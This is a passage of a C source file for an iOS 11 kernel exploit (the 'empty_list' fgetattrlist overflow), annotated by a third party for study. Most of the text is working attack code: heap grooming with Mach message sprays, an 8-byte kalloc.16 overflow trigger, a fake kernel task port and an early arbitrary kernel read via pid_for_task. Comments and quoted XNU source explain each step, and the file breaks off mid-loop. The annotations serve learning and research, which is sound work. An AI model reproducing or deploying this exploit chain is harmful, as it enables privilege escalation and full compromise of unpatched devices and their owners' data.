Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
2459 lines (2058 sloc) 113 KB
#include <sys/resource.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <pthread.h>
#include <mach/mach.h>
#include "sploit.h"
#include "offsets.h"
#include "kmem.h"
// Before looking into this, it is recommended to have a high(and low) level view of the IPC subsystem
// A recommended read :
// https://bugs.chromium.org/p/project-zero/issues/detail?id=965#c10
// Mac OS X Internals - A Systems Approach : Chapter 9.3. Mach IPC: The Mac OS X Implementation
// And also, some knowledge of the internals of iOS heap would help understanding the "caving in" characteristic of the heap
// https://gsec.hitb.org/materials/sg2016/D2%20-%20Stefan%20Esser%20-%20iOS%2010%20Kernel%20Heap%20Revisited.pdf
void increase_limits() {
struct rlimit lim = {0};
// Quote [ This specifies a value one greater than the maximum file descriptor number that can be opened by this process. ]
// It's changing the maximum file descriptor number to open lots of files... but for what reason...?
// It'll become clear later that the reason for doing this is to create a whole stockload of pipes(A couple thousand)
int err = getrlimit(RLIMIT_NOFILE, &lim);
if (err != 0) {
printf("failed to get limits\n");
}
printf("rlim.cur: %lld\n", lim.rlim_cur);
printf("rlim.max: %lld\n", lim.rlim_max);
// The maximum value is hardcoded to 10240, as seen in the XNU source :
// #define OPEN_MAX 10240
lim.rlim_cur = 10240;
err = setrlimit(RLIMIT_NOFILE, &lim);
if (err != 0) {
printf("failed to set limits\n");
}
lim.rlim_cur = 0;
lim.rlim_max = 0;
err = getrlimit(RLIMIT_NOFILE, &lim);
if (err != 0) {
printf("failed to get limits\n");
}
printf("rlim.cur: %lld\n", lim.rlim_cur);
printf("rlim.max: %lld\n", lim.rlim_max);
}
#define IO_BITS_ACTIVE 0x80000000
#define IKOT_TASK 2
#define IKOT_NONE 0
void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver, uint64_t context) {
// clear the region we'll use:
memset(fake_port, 0, 0x500);
// This is to build an arbitrary primitive to read from arbitrary addresses.
// Refer to p.42 from "https://www.slideshare.net/i0n1c/cansecwest-2017-portal-to-the-ios-core"
// However, the function is also capable of building a fully functional kernel task port
*(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK;
*(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references
*(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights
// You don't need these to be set up in order to use the "pid_for_task" technique. That's why it's set to NULL in the earlier phases
*(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver;
*(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = context;
// This function also builds the fake task object. It could either be overlayed in the same memory chunk of the fake ipc_port, or can reside in a seperate memory at "fake_task_kaddr".
uint64_t fake_task_kaddr = fake_port_kaddr + 0x100;
*(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr;
uint8_t* fake_task = fake_port + 0x100;
// set the ref_count field of the fake task:
*(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references
// make sure the task is active
*(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1;
// set the vm_map of the fake task:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map;
// set the task lock type of the fake task's lock:
*(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22;
// set the bsd_info pointer to be 0x10 bytes before the desired initial read:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10;
}
int message_size_for_kalloc_size(int kalloc_size) {
return ((3*kalloc_size)/4) - 0x74;
}
#define N_EARLY_PORTS 80000
mach_port_t early_ports[N_EARLY_PORTS+20000];
int next_early_port = 0;
// Allocate a whole bunch of ports. This kind of has the benefit of filling in all the ipc_port object holes that initially existed before the process started.
// These ports will be borrowed and used to spray a whole ton of kalloc.16 chunks. The reason why we don't just immediately create a port and use that to spray,
// is because if you create a port, then you create additional allocations including the ipc_object. In contrast, if you borrow an already existing port and just send a
// heap spray message to it, the noisy allocations will be muted.
void alloc_early_ports() {
for (int i = 0; i < N_EARLY_PORTS; i++) {
kern_return_t err;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &early_ports[i]);
if (err != KERN_SUCCESS) {
printf("mach_port_allocate failed to allocate a new port for early_ports (%d)\n", i);
}
}
next_early_port = N_EARLY_PORTS-1;
}
// This borrows one of the ports from the early port pool
mach_port_t steal_early_port() {
if (next_early_port == 0) {
printf("out of early ports\n");
sleep(100);
}
mach_port_t p = early_ports[next_early_port];
next_early_port--;
//early_ports[next_early_port--] = MACH_PORT_NULL;
return p;
}
// For debugging purposes
void dump_early_ports(){
for (int i = 0; i < N_EARLY_PORTS; i++) {
printf("EARLY %d %08x\n", i, early_ports[i]);
}
}
// This is not used. The early ports preserve throughout the entire exploit
void clear_early_ports() {
for (int i = 0; i < next_early_port; i++) {
mach_port_destroy(mach_task_self(), early_ports[i]);
}
}
struct kalloc_16_send_msg {
mach_msg_header_t hdr;
mach_msg_body_t body;
mach_msg_ool_ports_descriptor_t ool_ports;
uint8_t pad[0x200];
};
// What this basically does is spray a single kalloc.16 chunk in memory by sending a OOL port descriptor message. Standard heap spray technique.
mach_port_t kalloc_16() {
kern_return_t err;
// take an early port:
mach_port_t port = steal_early_port();
// insert a send right:
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
uint32_t msg_size = message_size_for_kalloc_size(0x110);
// send a message with two OOL NULL ports; these will end up in a kalloc.16:
struct kalloc_16_send_msg kalloc_msg = {0};
kalloc_msg.hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
kalloc_msg.hdr.msgh_size = msg_size; //sizeof(struct kalloc_16_send_msg);
kalloc_msg.hdr.msgh_remote_port = port;
kalloc_msg.hdr.msgh_local_port = MACH_PORT_NULL;
kalloc_msg.hdr.msgh_id = 0x41414141;
kalloc_msg.body.msgh_descriptor_count = 1;
mach_port_t ool_ports[2] = {0xffffffff, 0xffffffff};
kalloc_msg.ool_ports.address = ool_ports;
kalloc_msg.ool_ports.count = 2;
kalloc_msg.ool_ports.deallocate = 0;
kalloc_msg.ool_ports.disposition = MACH_MSG_TYPE_COPY_SEND;
kalloc_msg.ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
kalloc_msg.ool_ports.copy = MACH_MSG_PHYSICAL_COPY;
// send it:
err = mach_msg(&kalloc_msg.hdr,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
(mach_msg_size_t)msg_size,//sizeof(struct kalloc_16_send_msg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("sending kalloc.16 message failed %s\n", mach_error_string(err));
}
return port;
}
#define N_MIDDLE_PORTS 50000
mach_port_t middle_ports[N_MIDDLE_PORTS];
int next_middle_port = 0;
// Create a bunch of ports with send writes. One of these ports will end up as a dangling port that will be abused throughout the entire exploit
mach_port_t alloc_middle_port() {
mach_port_t port;
kern_return_t err;
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // added
if (err != KERN_SUCCESS) {
printf("failed to alloc middle port\n");
}
middle_ports[next_middle_port++] = port;
return port;
}
struct ool_multi_msg {
mach_msg_header_t hdr;
mach_msg_body_t body;
mach_msg_ool_ports_descriptor_t ool_ports[0];
};
// To free them either receive or destroy the message
mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, int messages_to_send, mach_port_t holder_port, mach_port_t* source_ports) {
/*
#define MACH_PORT_QLIMIT_MAX MACH_PORT_QLIMIT_LARGE
*/
// You can only send "MACH_PORT_QLIMIT_MAX = MACH_PORT_QLIMIT_LARGE" messages to a single port.
if (messages_to_send > MACH_PORT_QLIMIT_LARGE) {
printf("****************** too many messages\n");
return MACH_PORT_NULL;
}
kern_return_t err;
// Port that is going to intentionally not receive the mach message. This will preserve the kalloc OOL ports array in the kernel memory. For heap spraying.
mach_port_t port = MACH_PORT_NULL;
if (holder_port == MACH_PORT_NULL) {
// If "holder_port" is MACH_PORT_NULL, then allocate a new holder port will be used to send messages to.
err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
// Insert a send right
mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
if (err != KERN_SUCCESS) {
printf("failed to allocate port for hold kallocs\n");
}
// bump up the number of messages we can enqueue:
//
// ↑ Like the comment says. Bump it up to "MACH_PORT_QLIMIT_MAX", so we can spray a lot of OOL port descriptor arrays(up to MACH_PORT_QLIMIT_MAX) on a single port.
mach_port_limits_t limits = {0};
limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
err = mach_port_set_attributes(mach_task_self(),
port,
MACH_PORT_LIMITS_INFO,
(mach_port_info_t)&limits,
MACH_PORT_LIMITS_INFO_COUNT);
if (err != KERN_SUCCESS) {
printf(" [-] failed to increase queue limit\n");
exit(EXIT_FAILURE);
}
// The new holder port will be returned.
} else {
// You could also supply a port to send to
port = holder_port;
}
// these are MACH_PORT_NULL
//
// ↑ Like the comment says :
/*
#define MACH_PORT_NULL
*/
// calloc initializes the buffer with all zero
mach_port_t* ports_to_send = calloc(kalloc_size/8, sizeof(mach_port_name_t));
// Calculating the size of the mach message header, body, and the message data (the trailing OOL ports)
size_t message_size = offsetof(struct ool_multi_msg, ool_ports[allocs_per_message+1]);
// Allocate it, and fill the various info shortly after
struct ool_multi_msg* msg = malloc(message_size);
memset(msg, 0, message_size);
// This is required to send ool(out-of-line) messages
msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
msg->hdr.msgh_size = (uint32_t) message_size;
// The mach message is going to be sent here, but it's not going to receive it immediately
msg->hdr.msgh_remote_port = port;
// We don't need to send it back to us
msg->hdr.msgh_local_port = MACH_PORT_NULL;
// Can be any random value
msg->hdr.msgh_id = 0x12340101;
// So apprently, you can send multiple ool arrays by setting this value. This means you can kalloc several times in one single message.
msg->body.msgh_descriptor_count = allocs_per_message;
for (int i = 0; i < allocs_per_message; i++) {
// This will point to the array of ports. These ports will be converted to the real mach port object's address that's in the kernel, but what's important is that
// there will be space allocated by kalloc to hold these addresses, exactly the size of the passed function parameter, "kalloc_size".
msg->ool_ports[i].address = source_ports != NULL ? source_ports : ports_to_send;
msg->ool_ports[i].count = kalloc_size/8;
// Don't let it be immediately freed
msg->ool_ports[i].deallocate = 0;
// For sending the message
msg->ool_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
// This indicates that the current ool data is an ool ports descriptor, which is basically an array of ports
msg->ool_ports[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
// To actually make the kernel kalloc and copy the port array data into the kernel
// Quote [ MACH_MSG_PHYSICAL_COPY : In a sent message, this flag requires that the kernel construct an actual copy of the memory (either into wired kernel memory or default memory managed space). There is a (fairly large) limit on the amount of data that can be physically copied in a message. Port arrays always assume this option when sent. ]
msg->ool_ports[i].copy = MACH_MSG_PHYSICAL_COPY;
}
// You could send multiple messages(up to MACH_PORT_QLIMIT_MAX) to a single port. So this gives us a kalloc x*y times heap spraying primitive.
for (int i = 0; i < messages_to_send; i++) {
// send it:
err = mach_msg(&msg->hdr,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
(uint32_t)message_size,
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("%s\n", mach_error_string(err));
//exit(EXIT_FAILURE);
}
}
// Freeing these won't free the sprayed kallocs. Only freeing userspace buffers.
free(ports_to_send);
free(msg);
return port;
}
uint8_t msg_buf[10000];
// By receiving a message on a specific port, we can deallocate the kalloc that's attached to that specific message.
void discard_message(mach_port_t port) {
mach_msg_header_t* msg = (mach_msg_header_t*)msg_buf;
kern_return_t err;
err = mach_msg(msg,
MACH_RCV_MSG | MACH_MSG_TIMEOUT_NONE, // no timeout
0,
10000,
port,
0,
0);
if (err != KERN_SUCCESS){
printf("error receiving on port: %s\n", mach_error_string(err));
}
mach_msg_destroy(msg);
}
#include <sys/attr.h>
int vfs_fd = -1;
struct attrlist al = {0};
size_t attrBufSize = 16;
void* attrBuf = NULL;
// It's setting the attributes to engender an overflow. The other things are not important and are set to guide the execution towards the vulnerable code path.
// But they are required, and will become clear later in the vuln root cause analysis. The most important field here if "attrBuf", which is 16.
void prepare_vfs_overflow() {
// You can open this even within the Safari Webcontent Sandbox
vfs_fd = open("/", O_RDONLY);
if (vfs_fd == -1) {
perror("unable to open fs root\n");
return;
}
// Why we need to set these are explained below
al.bitmapcount = ATTR_BIT_MAP_COUNT;
al.volattr = 0xfff;
al.commonattr = ATTR_CMN_RETURNED_ATTRS;
attrBuf = malloc(attrBufSize);
}
// This will do a kalloc.16, overflow out of it with 8 NULL bytes, then free it
//
// Let's track down the execution flow.
// /bsd/kern/syscalls.master :
/*
228 AUE_FGETATTRLIST ALL { int fgetattrlist(int fd, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); }
*/
// /bsd/vfs/vfs_attrlist.c
/*
int
fgetattrlist(proc_t p, struct fgetattrlist_args *uap, __unused int32_t *retval)
{
struct vfs_context *ctx;
vnode_t vp = NULL;
int error;
struct getattrlist_args ap;
ctx = vfs_context_current();
error = 0;
if ((error = file_vnode(uap->fd, &vp)) != 0)
return (error);
if ((error = vnode_getwithref(vp)) != 0) {
file_drop(uap->fd);
return(error);
}
ap.path = 0;
ap.alist = uap->alist;
ap.attributeBuffer = uap->attributeBuffer;
ap.bufferSize = uap->bufferSize;
ap.options = uap->options;
error = getattrlist_internal(vp, &ap, p, ctx); <- our user provided arguments are passed here
file_drop(uap->fd);
if (vp)
vnode_put(vp);
return error;
}
static int
getattrlist_internal(vnode_t vp, struct getattrlist_args *uap, proc_t p, vfs_context_t ctx)
{
struct attrlist al;
struct vnode_attr va;
...
...
// Copying what we passed in from userland to kernelland
if ((error = copyin(uap->alist, &al, sizeof(al))) != 0)
goto out;
// Aha! This explains the previous attribute setting :
// al.bitmapcount = ATTR_BIT_MAP_COUNT;
// If it weren't set, then the syscall would simply bail out with EINVAL
if (al.bitmapcount != ATTR_BIT_MAP_COUNT) {
error = EINVAL;
goto out;
}
...
// There is a MAC check here. According to @niklas_b, this MAC check passes even within the Safari WebContent Sandbox
#if CONFIG_MACF
error = mac_vnode_check_getattrlist(ctx, vp, &al);
if (error)
goto out;
#endif
...
// Aha! So this is why it was setting this attribute :
// al.volattr = 0xfff;
// It's trying to let the code flow into this code block...
if (al.volattr) {
if (al.fileattr || al.dirattr || al.forkattr) {
error = EINVAL;
VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: mixed volume/file/directory/fork attributes");
goto out;
}
// And eventually into here
error = getvolattrlist(vp, uap, &al, ctx, proc_is64); <- Trying to enter the vulnerable function
goto out;
}
static int
getvolattrlist(vnode_t vp, struct getattrlist_args *uap, struct attrlist *alp,
vfs_context_t ctx, int is_64bit)
{
struct vfs_attr vs;
struct vnode_attr va;
// This is an important struct that is involed in the overflow. Let's see how it's defined.
struct _attrlist_buf ab;
...
...
struct _attrlist_buf {
char *base;
char *fixedcursor;
char *varcursor;
ssize_t allocated;
ssize_t needed;
attribute_set_t actual;
attribute_set_t valid;
};
// The size of this struct is 0x14.
typedef struct attribute_set {
attrgroup_t commonattr;
attrgroup_t volattr;
attrgroup_t dirattr;
attrgroup_t fileattr;
attrgroup_t forkattr;
} attribute_set_t;
// Now back to the "getvolattrlist" function.
static int
getvolattrlist(vnode_t vp, struct getattrlist_args *uap, struct attrlist *alp,
vfs_context_t ctx, int is_64bit)
{
struct vfs_attr vs;
struct vnode_attr va;
struct _attrlist_buf ab;
...
...
...
// Aha! So that's why it set this attribute :
// al.commonattr = ATTR_CMN_RETURNED_ATTRS;
// The "return_valid" variable is used in a lot of places throughout the function, and most of the times bails out if not set to ATTR_CMN_RETURNED_ATTRS.
// Also it's actually used to trigger the vulnerability, as seen below.
return_valid = (alp->commonattr & ATTR_CMN_RETURNED_ATTRS);
pack_invalid = (uap->options & FSOPT_PACK_INVAL_ATTRS);
if (pack_invalid) {
if (!return_valid) {
error = EINVAL;
goto out;
}
...
...
...
// It's allocating the overflown buffer. See how it's taking the user supplied "uap->bufferSize" as the allocation size.
ab.allocated = imin(uap->bufferSize, fixedsize + varsize);
if (ab.allocated > ATTR_MAX_BUFFER) {
error = ENOMEM;
VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
goto out;
}
// It allocates it here.
MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_WAITOK); <- Remember, ab.allocated is 16. So a kalloc.16 chunk is allocated.
...
...
if (return_valid) {
ab.fixedcursor += sizeof (attribute_set_t);
// It initializes the ab.actual struct with all zeros
bzero(&ab.actual, sizeof (ab.actual));
}
...
...
...
// See. This needs to be set in order to reach the vulberable codeblock.
if (return_valid) {
ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
if (pack_invalid) {
ab.actual.commonattr &= ab.valid.commonattr;
ab.actual.volattr &= ab.valid.volattr;
}
// Now here is the vulnerability.
// "ab.base" is allocated "uap->bufferSize" size, which is 0x10. But "sizeof(ab.actual)" is 0x14, and therefore, bcopying from "ab.base + sizeof(uint32_t)" by
// 0x14 amount of size will copy 8 more bytes than intended! So this would mean "ab.actual.fileattr" and "ab.actual.forkattr" will be overflowed into the adjacent chunk,
// but since only volattr was set when the syscall was invoked, those two will be unchanged from 0, and hence, two 0 DWORDs will be overflowed at the edge of ab.base.
// One might wonder, 'Why didn't you set those two values from userland so you can actually overflow user controlled values? That question can be answered by revisiting
// the "getattrlist_internal" function :
/ *
static int
getattrlist_internal(vnode_t vp, struct getattrlist_args *uap, proc_t p, vfs_context_t ctx)
{
...
...
...
if (al.volattr) {
if (al.fileattr || al.dirattr || al.forkattr) {
error = EINVAL;
VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: mixed volume/file/directory/fork attributes");
goto out;
}
error = getvolattrlist(vp, uap, &al, ctx, proc_is64);
goto out;
}
* /
// See. When "al.volattr" is set, others cannot be set, otherwise the syscall will bail out. So we are forced with an 8 NULL byte overflow.
// Now the vulnerability is understood. Let's go back and see what it's trying to do with these NULLs.
bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
}
*/
void do_vfs_overflow() {
int options = 0;
int err = fgetattrlist(vfs_fd, &al, attrBuf, attrBufSize, options);
//printf("err: %d\n", err);
}
mach_port_t initial_early_kallocs[80000];
int next_early_kalloc = 0;
mach_port_t middle_kallocs[80000];
int next_middle_kalloc = 0;
// in the end I don't use these, but maybe they help?
volatile int keep_spinning = 1;
void* spinner(void* arg) {
while(keep_spinning);
return NULL;
}
#define N_SPINNERS 100
pthread_t spin_threads[N_SPINNERS];
// These are busy threads that make the scheduler toss the CPU to these threads, instead of other threads that are running in other processes in the system.
// They exist in order to minimize the chance of CPU claiming from exterior processes, so that those processes won't induce kallocs that would interfere
// during the delicate heap grooming process.
void start_spinners() {
return;
for (int i = 0; i < N_SPINNERS; i++) {
pthread_create(&spin_threads[i], NULL, spinner, NULL);
}
}
// Stop the spinning threads
void stop_spinners() {
return;
keep_spinning = 0;
for (int i = 0; i < N_SPINNERS; i++) {
pthread_join(spin_threads[i], NULL);
}
}
const int total_fds = 14*0x1f*8;
int read_ends[total_fds];
int write_ends[total_fds];
int next_pipe_index = 0;
mach_port_t early_read_port = MACH_PORT_NULL;
int early_read_read_fd = -1;
int early_read_write_fd = -1;
uint64_t early_read_known_kaddr = 0;
// read_fd and write_fd are the pipe fds which have a pipe buffer at known_addr
// "prepare_early_read_primitive(target_port, read_ends[pipe_target_kaddr_replacer_index], write_ends[pipe_target_kaddr_replacer_index], pipe_target_kaddr);"
void prepare_early_read_primitive(mach_port_t target_port, int read_fd, int write_fd, uint64_t known_kaddr) {
// This is the dangling port that's carefully setup to be used for AAR
early_read_port = target_port;
// With the pipes, we can constantly change what's inside the fake task object's buffer
early_read_read_fd = read_fd;
early_read_write_fd = write_fd;
// The fake task object's kernel address. We can use this not only for the fake task object but other purposes too.
early_read_known_kaddr = known_kaddr;
}
uint32_t early_rk32(uint64_t kaddr) {
uint8_t* buf = malloc(0xfff);
read(early_read_read_fd, buf, 0xfff);
// We have to constantly rebuild the fake task port, because the arbitrary address we want to read has to be setup inside the fake task object
build_fake_task_port(buf, early_read_known_kaddr, kaddr, 0, 0, 0);
write(early_read_write_fd, buf, 0xfff);
uint32_t val = 0;
kern_return_t err = pid_for_task(early_read_port, &val);
if (err != KERN_SUCCESS) {
printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
}
printf("read val via pid_for_task: %08x\n", val);
free(buf);
return val;
}
// Two consecutive pid_for_task for a QWORD read
uint64_t early_rk64(uint64_t kaddr) {
uint64_t lower = (uint64_t)early_rk32(kaddr);
uint64_t upper = (uint64_t)early_rk32(kaddr + 4);
uint64_t final = lower | (upper << 32);
return final;
}
// Let's try to understand what's happening
void vfs_sploit() {
printf("empty_list by @i41nbeer\n");
// Checking if iOS version is between 11.0 ~ 11.3.1, and setting up various kernel structure offsets
offsets_init();
// Creating lots of busy threads to minimize heap interference from other processes.
start_spinners();
printf("vfs_sploit\n");
// Increase maximum number of files that can be opened.
increase_limits();
size_t kernel_page_size = 0;
// How big a "Page Size" on this device?
host_page_size(mach_host_self(), &kernel_page_size);
if (kernel_page_size == 0x4000) {
printf("this device uses 16k kernel pages\n");
} else if (kernel_page_size == 0x1000) {
printf("this device uses 4k kernel pages\n");
} else {
printf("this device uses an unsupported kernel page size\n");
exit(EXIT_FAILURE);
}
// Prepare initial parameters to pass to the vulnerable syscall
prepare_vfs_overflow();
// set up the heap:
// allocate a pool of early ports; we'll use some of these later
alloc_early_ports();
if (kernel_page_size == 0x1000) {
// It's filling up the holes in the 0x10 zalloc zone for devices with 4K page size.
// This is probably because the kalloc.16 zone is a lot busier(more initial holes) than 16K page devices.
mach_port_t initial_kallocs_holder = hold_kallocs(0x10, 100, 100, MACH_PORT_NULL, NULL);
}
// 0x110 will be the kalloc size of the ipc_kmsg allocation for the kalloc.16 messages
// we need to ensure that these allocations don't interfere with the page-level groom,
// so ensure there's a long freelist for them
// make 30'000 kalloc(0x110) calls then free them all
//
// In the loop below, it's going to send a myriad of mach messages via "kalloc_16()". In every message sent, an "ipc_kmsg" struct will be created an held in memory
// until the message is received. Initially, "kmsg = ipc_kmsg_alloc(msg_and_trailer_size);" tries to get kmsg objects from a per processor cache, but it quickly runs
// out and starts to kalloc() 0x110 chunks continuously.
// Looking at Ian's comment below, he wants the sequence of pages to look exactly as below. If "ipc_kmsg" structs were to interfere, then that order would be
// changed by having random kalloc.0x110 pages inbetween them which would reduce reliability. By creating an extremely long freelist of 0x110 chunks, we can ensure
// that the "ipc_kmsg" will play inside that specific large freelist pool, and not jump into newly allocated pages that are to be used with kalloc.16 and ipc_ports.
// 50000 free chunks are enough because the maximum kalloc.16 allocated at a given time is around 15000.
mach_port_t flp = hold_kallocs(0x110, 100, 500, MACH_PORT_NULL, NULL);
mach_port_destroy(mach_task_self(), flp);
// try to groom our initial pattern:
// kalloc.16 | ipc_ports | kalloc.16 | ipc_ports ...
// first off we're just trying to get the pages like that
// How many pages are we going to spray?
int INITIAL_PATTERN_REPEATS = kernel_page_size == 0x4000 ? 40 : 60;
// Leftover code, not really used anywhere.
mach_port_t kalloc_holder_port = MACH_PORT_NULL;
// Calculate the ammount of allocations needed to fill exactly one page for kalloc.16, and for the "ipc_port" object.
int kallocs_per_zcram = kernel_page_size/0x10; // 0x1000 with small kernel pages, 0x4000 with large
/*
struct ipc_port {
struct ipc_object ip_object;
union {
struct ipc_space *receiver;
struct ipc_port *destination;
ipc_port_timestamp_t timestamp;
} data;
ipc_kobject_t ip_kobject;
mach_port_mscount_t ip_mscount;
mach_port_rights_t ip_srights;
mach_port_rights_t ip_sorights;
struct ipc_port *ip_nsrequest;
struct ipc_port *ip_pdrequest;
struct ipc_port_request *ip_dnrequests;
unsigned int ip_pset_count;
struct ipc_mqueue ip_messages;
struct ipc_kmsg *ip_premsg;
...
...
...
int alias;
};
*/
// The ipc_port object size is 0xA8. This calculation kind of implies for 4K pages, the ipc_port object spans 3 pages. The 16K page calculation is kind of wierd though..
int ports_per_zcram = kernel_page_size == 0x1000 ? 0x49 : 0xe0; // 0x3000 with small kernel pages, 0x4000 with large
// I didn't really know that the pages for kallocs that exhausted their freelists are picked up consecutively. Well, that seems to be the case. It's kind of an
// assumption throughout the entire exploit if you look at the exploit logic. Like Ian mentions in the above comment, he's trying to create a consecutive, interleaving pattern of allocations.
for (int i = 0; i < INITIAL_PATTERN_REPEATS; i++) {
// 1 page of kalloc
for (int i = 0; i < kallocs_per_zcram; i++) {
mach_port_t p = kalloc_16();
// Stash them away so they can be freed later
initial_early_kallocs[next_early_kalloc++] = p;
}
// 3 page worth of sprayed ports
for (int i = 0; i < ports_per_zcram; i++) {
// What are these middle ports used for? We'll soon find out I guess.
mach_port_t port = alloc_middle_port();
}
}
// now we hopefully have a nice arrangement of repeated fresh 'k.16 | ipc_port' pages
// to understand this next bit it's important to notice that zone allocations will come first
// from intermediate (partially full) pages. This means that if we just start free'ing and
// allocating k.16 objects somewhere in the middle of the groom they won't be re-used until
// the current intermediate page is either full or empty.
// this provides a challenge because fresh page's freelist's are filled semi-randomly such that
// their allocations will go from the inside to the outside:
//
// | 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page
//
// this means that our final intermediate k.16 and ports pages will look a bit like this:
//
// | - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - |
// kalloc.16 ipc_ports
// if we use the overflow to corrupt a freelist entry we'll panic if it gets allocated, so we
// need to avoid that
// the trick is that by controlling the allocation and free order we can reverse the freelists such that
// the final intermediate pages will look more like this:
//
// | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 |
// kalloc.16 ipc_ports
//
// at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow
// such that we can hit the first qword of an ipc_port
// ↑ Wow. That's a pretty genious plan.
// free them all, reversing the freelists!
//
// By freeing them in the same order as they were allocated, we create a freelist that caves inward.
// This creates 240K worth of free chunks, but I think that's not enough to trigger to Garbage Collector, so we don't have to worry about GC.
for (int i = 0; i < next_early_kalloc; i++) {
// This will receive the message, hence, deallocating the sprayed kalloc.16 chunks.
discard_message(initial_early_kallocs[i]);
}
int HOP_BACK = kernel_page_size == 0x4000 ? 16 : 30;
// We're gonna refill those pages, because the following overflow logic requires all of the interacting kalloc.16 and ipc_port pages to be completely full with zero free holes.
// It doesn't go all the way back to the beginning, because during the beginning of the heap grooming, the sprays were busy filling in already existing random holes, so
// ideally we want the HOP_BACK page to point to a region which we're completely sure that the kalloc.16 and ipc_port pages are criss-crossing. Don't go too far back or
// else we'll start picking up the initial random holes.
for (int i = 0; i < INITIAL_PATTERN_REPEATS - HOP_BACK; i++) {
for (int i = 0; i < kallocs_per_zcram; i++) {
mach_port_t p = kalloc_16();
// Almost all of these sprayed kalloc.16 chunks won't be freed and will stay in memory during the rest of the exploit
middle_kallocs[next_middle_kalloc++] = p;
}
}
// This is going to hold the overflown, corrupted port. It is the most important port and will be abused throughout the entire exploit.
mach_port_t target_port = MACH_PORT_NULL;
// Hopping back a couple pages we can be pretty sure that an ipc_port page will be behind the current kalloc.16 freelist pointing page.
// The following calculates the aproximate range of where the overwritten port lies in. The reason why we know this range is because we are consecutively creating kalloc.16 and ipc_port pages in a fixed pattern,
// and we know exactly how much pages we have hopped back for kalloc.16(HOP_BACK). We can calculate an approximate range for where the overwritten target ipc_port would lie in, by assuming the extreme
// minimum/maximum cases for the last allocation of kalloc.16 and ipc_port before starting to hop back. (i.e. The last allocated kalloc.16 is the first item in the page and the last ipc_port allocated
// is the last item in the page : case 1. case 2 is opposite. This should give the min/max range, and that's what's being calculated below)
int first_candidate_port_index = next_middle_port - ((HOP_BACK+2)*ports_per_zcram); // 32 35 +2
int last_candidate_port_index = next_middle_port - ((HOP_BACK-2)*ports_per_zcram); // 28 25 -2
//sched_yield();
// wait a second
// this is a load-bearing sleep - this works better than sched_yield
// we want this loop to be as fast as possible, and ideally not get pre-empted
// don't remove this :)
// ↑ load-bearing? I'm not entirely sure what he means by this.
// Using my imagination, I think when the program voluntarily stops using the CPU for a (prolonged) 1 second, then when the kernel gets a timer interrupt and the task resumes,
// it moves up the priority list and hence more time slice from the scheduler because it has forfeit the CPU for quite a long time. I'm gonna have to look through the
// scheduling algorithm one day to fully understand the benefits of this.
sleep(1);
// Like Ian mentioned, he wants an absolute minimum interference in heap-feng-shui during this loop. This loop seems critical to the vuln exploitation. Let's see what's going on.
for (int i = 0; i < kallocs_per_zcram; i++) {
